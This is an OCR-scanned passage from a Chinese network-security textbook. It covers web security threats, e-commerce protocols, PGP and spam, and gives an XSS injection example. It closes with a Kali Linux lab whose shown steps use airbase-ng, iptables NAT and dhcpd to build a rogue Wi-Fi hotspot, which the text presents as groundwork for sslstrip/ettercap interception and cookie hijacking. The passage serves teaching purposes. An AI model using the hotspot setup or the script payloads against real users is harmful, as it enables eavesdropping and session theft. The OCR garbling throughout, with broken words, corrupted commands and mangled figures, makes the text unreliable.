户 做 一 些 比如 身份 认证 、 投 票 之 类 的 事情 就 比较 麻烦 ,由 此 产生 了 动态 网 页 的 概念 ,动态 是 
指 利用 Flash、JavaScript、VBScript 等 技术 ,在 网 页 中 其 入 一 些 可 运行 的 小 程序 , Web 浏览 
器 在 解释 页 面 时 ,看 到 这 些小 程序 就 运行 它们 。 小 程序 的 使 用 让 Web 服务 模式 有 了 双向 交 
流 的 能 力 , Web 服务 模式 也 可 以 像 传 统 软 件 一 样 进行 各 种 事务 处 理 ,如 编辑 文件 ,提交 表单 
等 。 小 程序 也 可 以 是 嵌入 网 页 文件 中 的 PHP、JSP、ASP 代码 ,或 者 以 文件 的 形式 单独 存放 
在 Web 服务 器 的 目录 里 的 . php、.jsp、. asp 文件 等 ,用 户 看 不 到 这 些 代码 ,因此 服务 的 安全 
性 大 大 提高 。 这 样 功 能 的 小 程序 越 来 越 多 ,形成 常用 的 工具 包 , 单 独 管理 ,开发 Web 程序 时 
直接 拿 来 使 用 即 可 ,这 就 是 中 间 件 服务 器 , 它 实 际 上 是 Web 服务 器 处 理 能 力 的 扩展 。 

静态 网 页 与 小 程序 是 事前 设计 好 的 ,一般 不 经 常 改动 ,但 网 站 上 有 很 多 内 容 需 要 经 常 更 
新 ,如 新 闻 、 博 客 、 邮 箱 等 ,这 些 变动 的 数据 放 在 数据 库 里 ,可 以 随时 更 新 。 当 用 户 请 求 页 面 
时 ,如 果 涉 及 数据 库 里 的 数据 ,小 程序 利用 SQL, 从 数据 库 中 读 取 数据 ,生成 完整 网 页 文件 ， 
送 给 用 户 。 例 如 ,股市 行情 曲线 就 是 由 一 个 小 程序 控制 的 ,不 断 地 用 新 数据 刷新 页 面 。 

用 户 的 一 些 状态 信息 、 属 性 信息 也 需要 临时 记录 ,每 个 用 户 的 这 些 信息 并 不 相同 , Web 
技术 为 了 记 住 用 户 的 访问 信息 ,采用 了 如 下 方法 。 

(1) Cookie 

把 用 户 的 参数 信息 (账户 名 .口令 等 ) 存 放 在 客户 端的 临时 文件 中 ,用 户 再 次 访问 该 网 站 
时 ,这 些 信 息 一 同 送 给 服务 器 。 

(2) Session 

把 用 户 的 参数 信息 存在 服务 器 的 内 存 中 ,或 写 在 服务 器 的 硬盘 文件 中 。 

11. Web 系统 架构 安全 分 析 

浏览 器 可 能 给 用 户 计 算 机 带 来 的 安全 问题 ,因为 Web 技术 可 以 对 本 地 硬盘 进行 操作 ， 
可 以 把 木马 ,病毒 放 到 客户 端 计算 机 上 。 另 外 ,针对 Web 服务 器 的 威胁 更 多 。 入 侵 者 可 以 
采取 如 下 等 方式 人 侵 Web 服务 器 。 

(1) 服务 器 系统 漏洞 

Web 服务 器 毕竟 是 一 个 通用 的 服务 器 ,无 论 是 Windows 还 是 Linux/UNIX, 都 不 可 少 
地 带 有 系统 自身 的 漏洞 .通过 这 些 漏洞 入 侵 , 可 以 获得 服务 器 的 高 级 权限 ,当然 对 服务 器 上 
运行 的 Web 服务 就 可 以 随意 控制 了 。 

(2) Web 服务 应 用 漏洞 

如 果 说 系统 级 的 软件 漏洞 被 关注 的 人 太 多 了 .那么 Web 应 用 软件 的 漏洞 数量 上 就 更 多 
了 ,因为 Web 服务 开发 简单 ,开发 的 团队 参差 不 齐 ,编程 不 规范 ,安全 意识 不 强 , 因 开发 时 间 
紧张 而 简化 测试 等 。 最 为 常见 的 SQL 注入 就 是 因为 在 大 多 应 用 编程 过 程 中 产生 了 漏洞 。 

(3) 密码 暴力 破解 

成 功 人 侵 Web 系统 后 ,入 侵 者 可 以 自 改 网 页 , 自 改 数据 、 挂 木马 等 。 
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7.1.2 应 用 安全 基础 


1. 网 页 防 算 改 系统 

网 页 防 算 改 系统 实时 监控 Web 站 点 , 当 Web 站 点 上 的 文件 受到 破坏 时 ,能 迅速 恢复 被 
破坏 的 文件 ,并 及 时 将 报告 提交 给 系统 管理 员 , 从 而 保护 Web 站 点 的 数据 安全 。 

2. 网 页 内 容 过 滤 技 术 

Web 页 面 内 容 过 滤 系 统 通 过 对 网 络 信息 流 中 的 内 容 进 行 过 滤 和 分 析 , 实 现 对 网 络 用 户 
浏览 或 传送 非法 黄色、 反动 等 敏感 信息 进行 监控 和 封杀 。 同 时 通过 强大 的 用 户 管理 功能 ， 
实现 对 用 户 的 分 组 管理 ` 分 时 管理 和 分 内 容 管理 。 

3. 实时 信息 过 滤 

实时 信息 过 滤 系 统 就 是 通过 对 企业 内 部 网 络 状 况 的 监控 ,对 企业 内 部 的 即时 短 消息 (如 
MSN ICQ ,雅虎 通 等 ) 的 通信 和 点 对 点 的 软件 通信 进行 多 方式 的 管理 。 

4. 广告 软件 Adware 

广告 软件 (Adware) 是 指 未 经 用 户 允 许 而 下 载 并 安装 ,与 其 他 软件 捆绑 并 通过 弹出 式 广 


告 或 以 其 他 形式 进行 商业 广告 宣传 的 程序 。 安 装 广告 软件 之 后 ,往往 造成 系统 运行 缓慢 或 
系统 异常 。 


5. 间谍 软件 (Spyware) 

间谍 软件 (Spyware) 是 能 够 在 使 用 者 不 知情 的 情况 下 ,在 用 户 计算 机 上 安装 后 门 程序 
的 软件 。 用 户 的 隐私 数据 和 重要 信息 会 被 那些 后 门 程序 捕获 ,甚至 这 些 * 后 门 程序 ?还 能 使 
黑客 远程 操纵 用 户 的 计算 机 。 

为 了 防止 广告 软件 和 间谍 软件 ,应 采用 安全 性 比较 好 的 网 络 浏览 器 ,并 注意 弥补 系统 漏 
洞 ,不 要 轻易 安装 共享 软件 或 “免费 软件 ,这 些 软件 往往 含有 广告 程序 .间谍 软件 等 不 良 软 
件 , 可 能 带 来 安全 风险 ,同时 也 不 要 浏览 不 良 网 站 。 

6. 浏览 器 动 持 

浏览 器 劫持 是 一 种 恶意 程序 ,通过 DLL Hi fF, BHO, Winsock LSP 等 形式 对 用 户 的 浏 
览 器 进行 自 改 ,使 用 户 浏览 器 出 现 访问 正常 网 站 时 被 转向 到 恶意 网 页 IE 浏览 器 主页 /搜索 
页 等 被 修改 为 支持 软件 指定 的 网 站 地 址 等 异常 。 浏 览 器 支持 分 为 多 种 不 同 的 方式 ,从 最 简 
单 的 修改 IE 默认 搜索 页 到 最 复杂 的 通过 病毒 修改 系统 设置 并 设置 病毒 守护 进程 ,劫持 浏览 
器 。 为 了 防止 浏览 器 被 劫持 ,建议 使 用 安全 性 能 比较 高 的 浏览 器 ,并 可 以 针对 自己 的 需要 对 
浏览 器 的 安全 设置 进行 相应 调整 ,如 果 给 浏览 器 安装 插件 ,尽量 从 浏览 器 提供 商 的 官方 网 站 
下 载 。 另 外 ,不 要 轻易 浏览 不 良 网 站 ,不 要 轻易 安装 共享 软件 、 盗 版 软件 。 

7. 恶意 共享 软件 

恶意 共享 软件 (Malicious Shareware) 是 指 采用 不 正当 的 捆绑 或 不 透明 的 方式 强制 安装 
在 用 户 的 计算 机 上 ,并 且 利 用 一 些 病毒 常用 的 技术 手段 造成 软件 很 难 被 卸载 ,或 采用 一 些 非 
法 手段 强制 用 户 购 买 的 免费 .共享 软件 。 


7.1.3 实例: XSS 跨 站 攻击 技术 


1. 什么 是 XSS 攻击 
XSS X. f CSS(Cross Site Script) , 即 跨 站 脚本 攻击 , 它 指 的 是 恶意 攻击 者 向 Web 页 面 
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里 插入 恶意 代码 , 当 用 户 浏览 该 页 之 时 ,嵌入 Web 里 面 的 恶意 代码 会 被 执行 ,从 而 达到 攻击 
者 的 特殊 目的 ,XSS 属于 被 动 式 的 攻击 。 
2. XSS 跨 站 脚本 攻击 原理 
建立 一 个 名 为 xss_test. html 的 文件 ,如 图 7-6 所 示 。 在 IE 中 打开 xss_test. html X 
件 ,可 以 看 到 如 图 7-7 所 示 的 窗口 。 


| aa a 
xss 测试 ! 


搜狐 新 闻 主 页 


图 7-6  xss test. html 文件 图 7-7 在 IE 中 打开 xss_test. html 文件 


修改 xss test. html 的 文件 ,如 图 7-8 所 示 。 在 IE 中 打开 xss_test. html 文件 ,可 以 看 
到 如 图 7-9 所 示 的 窗口 。 

3. XSS 跨 站 脚本 的 触发 条 件 

CD 完整 的 脚本 标记 。 在 某 个 表单 提交 内 容 时 ,可 以 构造 特殊 的 值 闭 合 标记 来 构造 完整 
无 错 的 脚本 标记 ,提交 的 内 容 是 : "> <script>alert(xss) ;一 /script 二 一 "。 

O 触发 事件 。 触 发 事件 是 指 只 有 达到 某 个 条 件 才 会 引发 的 事件 ,img 标记 有 一 个 可 以 
利用 的 onerror() 事 件 , 当 img 标记 含有 onerror() 事 件 并 且 图 片 没 有 正常 输出 时 便 会 触发 
该 事件 ,该 事件 中 可 以 加 入 任意 的 脚本 代码 ,如 图 7-10 Bros ,执行 后 的 结果 如 图 7-11 所 示 。 


iib qo E)r VIDTE test hl v Erb si 


my 
<head> 
<title> 

xss test 
</title> 
<h1> xss jahte </h1><hr> 
head> 


<body> 
<a hrer-"i 
</body> 
</html> 


> 搜狐 新 闻 主页 </a> 


图 7-8 修改 后 的 xss_test. html 文件 


body» 

King src-"http://wrong.veb.address" (TTIZETIETU 
</body> 
</html> 


图 7-10 构造 脚本 标记 图 7-11 在 Firefox 中 打开 xss test. html 文件 
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4. XSS 跨 站 入 侵 步 又 

第 1 步 : 在 某 个 论坛 注册 一 个 普通 用 户 。 

第 2 步 : 寻找 XSS 漏洞 。 

第 3 步 : 发 帖子 ,等 待 管理 员 浏 览 该 帖子 。 如 果 管 理 员 浏览 了 该 帖子 ,那么 就 实现 了 
XSS 跨 站 入 侵 。 


72 电子 商务 安全 


随 着 互联 网 的 不 断 发 展 ,在 世界 范围 内 掀起 了 一 股 电子 商务 热潮 。 许 多 国家 政府 部 门 
对 电子 商务 的 发 展 十 分 重视 ,并 纷纷 出 台 了 有 关 政 策 和 举措 。 实 现 电子 商务 的 关键 是 要 保 
证 商务 活动 过 程 中 系统 的 安全 性 , 即 保证 基于 互联 网 的 电子 交易 过 程 与 传统 交易 的 方式 一 
样 安全 可 靠 。 电 子 商务 的 安全 主要 采用 数据 加 密 和 身份 认证 技术 。 

电子 商务 的 实施 ,其 关键 是 要 保证 整个 商务 过 程 中 系统 的 安全 性 。 而 系统 的 安全 性 关 
键 在 于 CA 的 设计 与 规划 。 关 于 CA 的 相关 概念 ,请 见 3.6 节 。 

1. 电子 商务 的 安全 控制 要 求 概述 

(1) 信息 保密 性 

交易 中 的 商务 信息 有 保密 的 要 求 。 如 信用 卡 的 账号 和 用 户 名 被 人 知悉 ,就 可 能 被 盗用 ， 
订货 和 付款 的 信息 被 竞争 对 手 获悉 ,就 可 能 丧失 商机 。 因 此 在 电子 商务 的 信息 传播 中 一 般 
均 有 加 密 的 要 求 。 

(2) 交易 者 身份 的 确定 性 

网 上 交易 的 双方 很 可 能 素 昧 平生 ,相隔 千里 。 要 使 交易 成 功 ,首先 要 能 确认 对 方 的 身 
份 ,对 商家 而 言 要 考虑 客户 端 不 能 是 骗子 ,而 客户 也 会 担心 网 上 的 商店 不 是 一 个 弄虚作假 的 
黑店 。 因 此 能 方便 而 可 靠 地 确认 对 方 身份 是 交易 的 前 提 。 

(3) 不 可 否认 性 

由 于 商情 的 千变万化 ,交易 一 旦 达成 是 不 能 被 否认 的 。 否 则 必然 会 损害 一 方 的 利益 。 

(4) 不 可 修改 性 

交易 的 文件 是 不 可 被 修改 的 ,如 其 能 改动 文件 内 容 . 那 么 交易 本 身 便 是 不 可 靠 的 ,客户 
或 商家 可 能 会 因此 而 蒙受 损失 。 因 此 电子 交易 文件 也 要 做 到 不 可 修改 ,以 保障 交易 的 严肃 
和 公正 。 

2. 安全 交易 标准 

安全 交易 标准 主要 有 以 下 几 条 。 

(1) 安全 超 文本 传输 协议 (Secure HTTP,S-HTTP) 

依靠 密 钥 对 的 加 密 ,保障 Web 站 点 间 的 交易 信息 传输 的 安全 性 。 

(2) 安全 套 接 层 协议 (Secure Socket Layer. SSL 协议 ) 

由 网 景 (Netscape) 公 司 推出 的 一 种 安全 通信 协议 ,是 对 计算 机 之 间 整 个 会 话 进行 加 密 
的 协议 ,提供 了 加 密 、 认 证 服务 和 报 文 完整 性 。 它 能 够 对 信用 卡 和 个 人 信息 提供 较 强 的 保 
护 。SSL 被 用 于 Netscape Communicator 和 Microsoft IE 浏览 器 ,用 以 完成 需要 的 安全 交 
易 操作 。 在 SSL 中 ,采用 了 公开 密 钥 和 私有 密 钥 两 种 加 密 方 法 。 
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(3) 安全 交易 技术 协议 (Secure Transaction Technology. STT 协议 ) 

由 Microsoft 公司 提出 ,STT 将 认证 和 解密 在 浏览 器 中 分 离开 .用 以 提高 安全 控制 能 
力 。Microsoft 将 在 Internet Explorer 中 采用 这 一 技术 。 

(4) 安全 电子 交易 协议 (Secure Electronic Transaction ,SET 协议 ) 

SET 是 一 种 基于 消息 流 的 协议 , 它 主 要 由 MasterCard 和 Visa 两 大 信用 卡 公 司 以 及 其 
他 一 些 业界 主流 厂商 设计 、 于 1997 年 5 月 联合 推出 的 规范 ,SET 主要 是 为 了 解决 用 户 、 商 
家 和 银行 之 间 通 过 信用 卡 支 付 的 交易 而 设计 的 ,以 保证 支付 信息 的 机 密 、 支 付 过 程 的 完整 、 
商户 及 持 卡 人 的 合法 身份 .可 操作 性 。SET 中 的 核心 技术 主要 有 公开 密 是 加密、 电子 数字 
签名 、 电 子 信 封 . 电 子安 全 证 书 等 。 

3. 目前 安全 电子 交易 的 手段 

在 近年 来 发 表 的 多 个 安全 电子 交易 协议 或 标准 中 , 均 采 纳 了 一 些 常用 的 安全 电子 交易 
的 方法 和 手段 。 典 型 的 方法 和 手段 有 以 下 几 种 。 


(1) 密码 技术 
采用 密码 技术 对 信息 加 密 , 是 最 常用 的 安全 交易 手段 。 在 电子 商务 中 获得 广泛 应 用 的 
加 密 技 术 有 以 下 两 种 。 


公共 密 钥 和 私 用 密 钥 : 这 一 加 密 方法 亦 称 为 RSA 编码 法 ,是 由 Rivest, Shamir 和 
Adlernan 三 人 所 研究 发 明 的 。 它 利用 两 个 很 大 的 质数 相 乘 所 产生 的 乘积 来 加 密 。 这 两 个 
质数 无 论 哪 一 个 先 与 原文 件 编 码 相 乘 并 对 文件 加 密 , 均 可 由 另 一 个 质数 再 相 乘 来 解密 。 但 
要 用 一 个 质数 来 求 出 另 一 个 质数 则 是 十 分 困难 的 。 因 此 将 这 一 对 质数 称 为 密 钥 对 
(KeyPair)。 在 加 密 应 用 时 , 某 个 用 户 总 是 将 一 个 密 钥 公开 ,让 需 发 信 的 人 员 将 信息 用 其 公 
共 密 钥 加 密 后 发 给 该 用 户 ,而 一 旦 信息 加 密 后 ,只 有 用 该 用 户 一 个 人 知道 的 私 用 密 钥 才能 解 
密 。 具 有 数字 凭证 身份 的 人 员 的 公共 密 钥 可 在 网 上 查 到 , 亦 可 在 请 对 方 发 信息 时 主动 将 公 
共 密 钥 传 给 对 方 , 这 样 保证 在 Internet 上 传输 信息 的 保密 和 安全 。 

数字 摘要 (digitaldigest): 这 一 加 密 方法 亦 称 安全 Hash 编码 法 (Secure Hash 
Algorithm, SHA) 3X MD5(MD Standards for Message Digest) ,由 RonRivest 所 设计 。 该 编 
码 法 采用 单 向 Hash. 函数 将 需 加 密 的 明文 “摘要 ?成 一 串 128 bit 的 密 文 ,这 一 串 密 文 亦 称 为 
数字 指纹 (Finger Print) , 它 有 固定 的 长 度 , 且 不 同 的 明文 摘要 成 密 文 , 其 结果 总 是 不 同 的 ， 
而 同样 的 明文 其 摘要 必定 一 致 。 这 样 这 摘要 便 可 成 为 验证 明文 是 否 是 “ 真 身 ”的 “指纹 "了 。 

上 述 两 种 方法 可 结合 起 来 使 用 ,数字 签名 就 是 上 述 两 法 结合 使 用 的 实例 。 

(2) 数字 签名 (Digital Signature) 

在 书面 文件 上 签名 是 确认 文件 的 一 种 手段 。 签 名 的 作用 有 两 点 ,一 是 因为 自己 的 签名 
难以 否认 ,从 而 确认 了 文件 已 签署 这 一 事实 ; 二 是 因为 签名 不 易 仿 冒 ,从 而 确定 了 文件 是 真 
的 这 一 事实 。 数 字 签名 与 书面 文件 签名 有 相同 之 处 ,采用 数字 签名 ,也 能 确认 以 下 两 点 。 

O 信息 是 由 签名 者 发 送 的 。 

@ 信息 在 传输 过 程 中 未 曾 作 过 任何 修改 。 

这 样 数字 签名 就 可 用 来 防止 电子 信息 因 易 被 修改 而 有 人 作伪 ,或 冒 用 别人 名 义 发 送信 
息 , 或 发 出 ( 收 到 ) 信 件 后 又 加 以 否认 等 情况 发 生 。 

数字 签名 采用 了 双重 加 密 的 方法 来 实现 防伪 、 防 赖 ,其 原理 见 3.5 节 。 
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(3) 数字 时 间 惟 (Digital Time Stamp) 

交易 文件 中 ,时 间 是 十 分 重要 的 信息 。 在 书面 合同 中 ,文件 签署 的 日 期 和 签名 一 样 均 是 
十 分 重要 的 防止 文件 被 伪造 和 自 改 的 关键 性 内 容 。 

在 电子 交易 中 ,同样 需 对 交易 文件 的 日 期 和 时 间 信 息 采 取 安 全 措施 ,而 数字 时 间 截 服务 
(Digital Time Stamp Service,DTS) 就 能 提供 电子 文件 发 表 时 间 的 安全 保护 。 

数字 时 间 蕉 服 务 (DTS) 是 网 上 安全 服务 项 目 , 由 专门 的 机 构 提 供 。 时 间 蕉 是 一 个 经 加 
密 后 形成 的 凭证 文档 , 它 包 括 三 个 部 分 : 四 需 加 时 间 截 的 文件 的 摘要 ; @DTS 收 到 文件 的 
日 期 和 时 间 ; @DTS 的 数字 签名 。 

时 间 戳 产生 的 过 程 为 : 用 户 首先 将 需要 加 时 间 戳 的 文件 用 HASH 编码 加 密 形成 摘要 ， 
然后 将 该 摘要 发 送 到 DTS, DTS 在 加 入 了 收 到 文件 摘要 的 日 期 和 时 间 信 息 后 再 对 该 文件 加 
密 ( 数 字 签名 ) ,然后 送 回 用 户 。 由 Bellcore 创造 的 DTS 采用 如 下 的 过 程 : 加 密 时 将 摘要 信 
息 归 并 到 二 叉 树 的 数据 结构 ; 再 将 二 又 树 的 根 值 发 表 在 报纸 上 ,这 样 更 有 效 地 为 文件 发 表 
时 间 提 供 了 佐证 。 注 意 ,书面 签署 文件 的 时 间 是 由 签署 人 自己 写 上 的 ,而 数字 时 间 鹤 则 不 
然 , 它 是 由 认证 单位 DTS 来 加 的 ,以 DTS 收 到 文件 的 时 间 为 依据 。 因 此 ,时 间 戳 也 可 作为 
科学 家 的 科学 发 明文 献 的 时 间 认 证 。 

(4) 数字 凭证 (Digital Certificate. Digital ID) 

数字 凭证 又 称 为 数字 证 书 , 是 用 电子 手段 来 证 实 一 个 用 户 的 身份 和 对 网 络 资源 的 访问 
的 权限 。 在 网 上 的 电子 交易 中 ,如 双方 出 示 了 各 自 的 数字 凭证 ,并 用 它 来 进行 交易 操作 , 那 
么 双方 都 可 不 必 为 对 方 身 份 的 真 伪 担 心 。 数 字 赁 证 可 用 于 电子 邮件 .电子 商务 、 群 件 . 电 子 
基金 转移 等 各 种 用 途 。 

数字 凭证 的 内 部 格式 是 由 CCITTX. 509 国际 标准 所 规定 的 ,其 原理 见 3. 6 节 。 

(5) 认证 中 心 (Certification Authority. CA) 

在 电子 交易 中 ,无 论 是 数字 时 间 截 服务 还 是 数字 凭证 的 发 放 , 都 不 是 靠 交 易 的 双方 自己 
能 完成 的 ,而 需要 有 一 个 具有 权威 性 和 公正 性 的 第 三 方 来 完成 。CA 就 是 承担 网 上 安全 电 
子 交易 认证 服务 .能 签发 数字 证 书 , 并 能 确认 用 户 身份 的 服务 机 构 。 认 证 中 心 通常 是 企业 性 
的 服务 机 构 ,主要 任务 是 受理 数字 凭证 的 申请 、 签 发 及 对 数字 凭证 的 管理 。 认 证 中 心 依据 认 
证 操作 规定 (Certification Practice Statement,CPS) 来 实施 服务 操作 。 

上 述 五 个 方面 介绍 了 安全 电子 交易 的 常用 手段 ,各 种 手段 常常 是 结合 在 一 起 使 用 的 ,从 
而 构成 比较 全 面 的 安全 电子 交易 体系 。 


73 电子 邮件 加 密 技 术 


随 着 互联 网 的 迅速 发 展 和 普及 ,电子 邮件 已 经 成 为 网 络 中 最 为 广泛 、 最 受 欢迎 的 应 用 之 
一 。 当 前 ,电子 邮件 系统 的 发 展 面临 着 机 密 泄露 ,信息 欺骗 病毒 侵 扰 、 垃 圾 邮件 等 诸多 安全 
问题 的 困扰 。 人 们 对 电子 邮件 系统 和 服务 的 要 求 日 渐 提 高 ,其 中 安全 需求 尤为 突出 。 保 护 
邮件 安全 最 常用 的 方法 就 是 加 密 。 可 以 采用 PGP 软件 对 电子 邮件 进行 加 密 。 

PGP 的 全 称 是 Pretty Good Privacy, 它 是 互联 网 上 一 个 著名 的 共享 加 密 软 件 , 与 具体 
的 应 用 无 关 , 可 独立 提供 数据 加 密 、 数 字 签 名 、 密 钥 管 理 等 功能 ,适用 于 电子 邮件 内 容 的 加 密 
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和 文件 内 容 的 加 密 ; 也 可 作为 安全 工具 肉 入 应 用 系统 之 中 。 目 前 使 用 PGP 进行 电子 信息 
加 密 已 经 是 事实 上 的 应 用 标准 ,IETF 在 安全 领域 有 一 个 专门 的 工作 组 负责 进行 PGP 的 标 
准 化 工作 ,许多 大 的 公司 .机构 ,包括 很 多 安全 部 门 在 内 ,都 拥有 自己 的 PGP 密码 。 
PGP 软件 的 使 用 见 3.1 节 。 


74 防 垃圾 邮件 技术 


垃圾 邮件 是 仅 次 于 病毒 的 互联 网 公害 ,但 由 于 无 法 可 依 或 者 说 有 不 完善 的 法 律 可 依 ,再 
加 上 其 本 身 的 复杂 性 ,已 成 为 各 国电 子 邮 件 用 户 一 个 很 头疼 的 事情 。 尽 管 安全 厂商 已 经 和 
垃圾 邮件 进行 了 长 期 的 斗争 ,但 垃圾 邮件 并 没有 明显 地 减少 。 

1. 什么 是 垃圾 邮件 

中 国 互联 网 协会 2003 年 3 H 25 日 通过 的 反 垃圾 邮件 规范 对 垃圾 邮件 的 定义 如 下 。 

(1) 收 件 人 事先 没有 提出 要 求 或 者 同意 接收 的 广告 .电子 刊物 、 各 种 形式 的 宣传 品 等 宣 
传 性 的 电子 邮件 。 

(2) 收 件 人 无 法 拒 收 的 电子 邮件 。 

(3) 隐藏 发 件 人 身份 .地 址 、 标 题 等 信息 的 电子 邮件 。 

(4) 含有 虚假 的 信息 源 、 发 件 人 、 路 由 等 信息 的 电子 邮件 。 

2. 垃圾 邮件 的 危害 性 

CD 用 了 大 量 网 络 带宽 ,使 得 邮件 服务 器 的 CPU 时 间 大 量 消耗 在 接收 垃圾 邮件 方面 ， 
甚至 还 有 可 能 造成 邮件 服务 器 拥塞 ,因此 大 大 降低 了 整个 网 络 的 运行 效率 。 

(2) 垃圾 信息 导致 电子 邮件 使 用 率 降低 。 最 新 统计 显示 ,超过 60% 的 人 由 于 垃圾 信息 
的 泛滥 而 减少 了 电子 邮件 的 使 用 次 数 。 

(3) 复发 的 垃圾 邮件 不 仅 侵犯 了 收 件 人 的 隐私 权 及 占用 宝贵 的 信箱 空间 ,同时 还 在 删 
除 垃圾 邮件 方面 耗费 了 收 件 人 的 时 间 、 精 力 和 金钱 。 而且 有 些 垃圾 邮件 还 盗用 他 人 的 电子 
邮件 地 址 作为 发 信 地 址 ,这 样 就 严重 损害 了 他 人 的 信誉 。 

(4) 垃圾 邮件 成 为 病毒 .木马 程序 的 载体 ,影响 计算 机 的 正常 使 用 。 

C5) 被 黑客 利用 ,采用 邮件 炸弹 的 手段 对 网 络 进行 攻击 。 

(6) 严重 影响 公司 的 服务 形象 。 如 果 别 人 频繁 地 使 用 一 个 邮件 地 址 给 你 发 送 垃圾 邮 
件 ,那么 你 肯定 不 会 对 提供 这 个 邮件 服务 的 公司 有 好 感 。 

(7) 垃圾 邮件 宣传 的 多 半 是 各 种 广告 及 非法 言论 ,轻信 这 些 虚假 广告 会 给 我 们 带 来 经 
济 损失 ,而 且 带 有 人 色情、 反动 等 内 容 的 垃圾 邮件 已 经 对 现实 社会 造成 了 极 大 的 危害 。 

3. 避免 垃圾 邮件 的 几 种 方法 

COD. 至 少 拥 有 两 个 电子 邮箱 地 址 ,一 个 是 私人 邮箱 地 址 ; 另 一 个 是 公共 邮箱 地 址 。 私 
人 邮箱 地 址 用 于 个 人 的 通信 ,不 要 将 自己 的 邮箱 地 址 到 处 传播 ; 公共 邮箱 地 址 用 于 一 些 公 
共 论 坛 .聊天 室 注册 等 。 

(2) 如 果 私 人 邮箱 地 址 被 垃圾 邮件 制造 者 知道 ,那么 就 需要 再 申请 一 个 新 邮箱 。 

(3) 不 要 回应 垃圾 邮件 。 

(4) 不 要 单 击 来 自 可 疑 网 站 的 订阅 链接 。 
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(5) 可 以 用 Outlook 或 Foxmail 等 POP3 收 信 工 具 收 取 电 子 邮件 。 在 收 信 时 ,一 旦 看 
见 新 邮件 的 数量 超过 平时 数量 的 若干 倍 , 应 当 马上 停止 下 载 邮 件 ,然后 再 从 服务 器 删除 炸弹 
邮件 。 

4. 实例 : 垃圾 邮件 的 处 理 ( 略 ) 

进入 163 邮箱 ,依次 单 击 “ 设 置 ">“ 反 垃圾 /黑白 名 单 ” 命 令 , 可 以 将 垃圾 邮件 地 址 添加 
到 黑 名 单 。 


75 实例 : Kai nux Pĝ Wi- 热点 


这 里 再 介绍 一 种 方法 ,是 使 用 airbase-ng 十 dhcpd 创建 虚拟 Wi-Fi 热点 ; 顺便 使 用 
sslstrip 十 ettercap 进行 中 间 人 攻击 , 嗅 探 使 用 者 的 上 网 信息 和 劫持 cookie; 
实验 环境 如 图 7-12 所 示 。 


a a 


被 欺骗 者 
Android 攻击 者 : Kali Linux 2.0 


图 7-12 实验 环境 


第 1 步 : 开启 终端 1, 建 立 Wi-Fi 热点。 开启 终端 1, 依次 执行 如 下 命令 ,具体 过 程 
如 图 7-13 所 示 。 


# ifconfig -a // 查 看 无 线 网 络 接口 为 wlan0 
# ifconfig wlan0 down 

# iwconfig wlan0 mode monitor 

# ifconfig wlan0 up 

SIOCSIFFLAGS: Operation not possible due to RF — kill 

# rfkill list 

* rfkill unblock 0 

# ifconfig wlan0 up 

# airbase- ng - e ztg wlan0 // ft sr. Wi-Fi 热点 


用 airbase-ng 建立 Wi-Fi 热点 , Wi-Fi 热点 的 网 络 流量 会 被 定向 到 ato 虚拟 网 络 接 
口上 。 

第 2 步 : 开启 终端 2, 执 行 iptables 命令 。 开 启 终端 2. 将 如 下 命令 放 到 一 个 命令 行 中 执 
行 ,如 图 7-14 所 示 。 

ifconfig at0 up 

ifconfig at0 192.168.1.1 netmask 255.255.255.0 


route add — net 192.168.1.0 netmask 255.255.255.0 gw 192.168. 1.1 
echo 1 » /proc/sys/net/ipv4/ip forward 


iptables -F 
iptables — X 
iptables -Z 


iptables -t nat -F 
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root@iebian: ~# ifconfig wLan0 down 
root@iebian: ~# iwconfig wLan0 mode monitor 
root@iebian: ~# ifconfig wLan0 up 
ISIOCSIFFLAGS: Operation not possible due to RF-kill 
rootGdebian: ~# rfkill list 
0: tpacpi bluetooth sw: Bluetooth 
Soft blocked: no 
Hard blocked: no 
1: phy0: Wireless LAN 
Soft blocked: yes 
Hard blocked: no 
2: hci0: Bluetooth 
Soft blocked: no 
Hard blocked: no 
rootGdebian:-4 rfkill unblock 1 
root@debian: ~# ifconfig wlan0 up 
rootGdebian: ~# airbase-ng -e ztg wlanO 
07: 38: 29 Created tap interface at0 
07: 38:29 Trying to set MTU on at0 to 1500 
07:38: 29 Trying to set MTU on wlan0 to 1800 
07:38:29 Access Point with BSSID 9C: D2: 1E: AS: E7: F1 started. 


图 7-13 建立 WiFi 热点 


root@debian: - x 


rootGdebian: ~# ifconfig at0 up; ifconfig at0 192. 168. 1.1 netmask 255. 255. 255.0; route add -net 192. 168. 1. 
0 netmask 255.255.255.0 gw 192.168.1.1; echo 1 > /proc/sys/net/ipv4/ip forward; iptables -F; iptables -X; 
iptables iptables -t nat -F; iptables -t nat -X; iptables -t nat -Z; iptables -t mangle -F; iptables 
-t mangle -X; iptables -t mangle -Z; iptables -P INPUT ACCEPT; iptables -P OUTPUT ACCEPT; iptables -P FO| 
IRWARD ACCEPT; iptables -t nat -P PREROUTING ACCEPT; iptables -t nat -P OUTPUT ACCEPT; iptables -t nat -P 
POSTROUTING ACCEPT; iptables -t nat -A POSTROUTING -S 192. 168. 1.0/24 -o eth0 -j MASQUERADE; 

Iroot&iebian: -# [| 


图 7-14 执行 iptables 命令 


iptables -t nat -X 

iptables -t nat -Z 

iptables - t mangle -F 

iptables - t mangle - X 

iptables - t mangle -Z 

iptables — P INPUT ACCEPT 

iptables - P OUTPUT ACCEPT 

iptables — P FORWARD ACCEPT 

iptables -t nat 一 P PREROUTING ACCEPT 
iptables - t nat - P OUTPUT ACCEPT 
iptables - t nat - P POSTROUTING ACCEPT 
iptables — t nat - A POSTROUTING - s 192.168.1.0/24 -o eth0 — j MASQUERADE // 这 条 命令 很 关键 


第 3 步 : 开启 终端 3, 开 启 dhepd. HÍT apt-get install isc-dhep-server 命令 ,安装 dhcp 
软件 包 。 
编辑 dhcp 配置 文件 /etc/dhcp/dhcpd. conf ,内容 如 下 。 


default - lease 一 time 600; 

max - lease - time 7200; 

authoritative; 

subnet 192.168.1.0 netmask 255.255.255.0 ( 
option routers 192.168.1.1; 
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option subnet 一 mask 255.255.255.0; 
option domain - name "ztg"; 
option domain - name - servers 10.3.9.4; 
range 192.168.1.20 192.168.1.50; 

} 


开启 终端 3, 执 行 如 下 命令 来 开启 dhcpd, 如 图 7-15 所 示 。 


# /etc/init.d/isc- dhcp- server stop; dhcpd -d -f -cf /etc/dhcp/dhcpd. conf ato 


root@debian: ~ eoo 


root@deban - - root@debian: - x root@debian - x 
root@iebian: ~# /etc/ init. d/ 1sc- dhcp- server stop; dhcpd -d -f -cf /etc/ dhcp/ dhcpd conf at0| 
